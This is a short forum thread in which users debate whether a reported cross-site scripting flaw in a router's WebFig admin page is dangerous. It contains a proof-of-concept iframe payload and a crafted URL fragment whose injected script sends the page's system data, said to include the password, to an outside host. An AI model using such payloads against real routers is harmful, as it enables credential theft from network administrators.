hey guys
is this serious?
is my router vulnerable? can not repeat it myself tho…
This is not a vulnerability 
How will you make the router admin open such a malicious link with some code after the URL?
If you can do that, you can also make him type “system reset” in the console. Just have to be very convincing. And the admin has to be very naive too.
Sure, your malicious email to the router admin could be convincing enough, and he could open this URL, and receive a message in his browser. But this will not affect the router. The code executes in the browser.
Anyway, it is easier to just send some virus to the admin.
You know how some shady ad sites redirect to malware, offer exe downloads, “pdfs with surprise” for vulnerable viewers, and such? What prevents them from doing something like this:
<iframe src="http://192.168.88.1/webfig/#%22%3E%3Cscript%3Ealert%28%22XSSED%20By%20Nassim%20Asrir%22%29;%3C/script%3E"></iframe>
With right javascript, it could do some damage.
To your PC, not the router. Many things can do damage to your PC.
The bad thing here is that script written in url executes in context of WebFig page. So if I append this:
#"><script>var xhr=new XMLHttpRequest();xhr.open("GET","http://other.server.tld/?sysres="+encodeURIComponent(JSON.stringify(window.parent.sysres)));xhr.send();</script>
I get some interesting info (password, …) sent to http://other.server.tld.
The good news is that it can’t be used as I thought. Such thing would be major problem for regular website where you log in and stay logged in even when you open it again in new window or frame (in same browser). But you can’t (it seems) do that with WebFig, opening http:///webfig/ again in new window or frame requires you to log in again, even though you’re already logged in in previous window. So while it technically is a vulnerability, it should not be dangerous at all.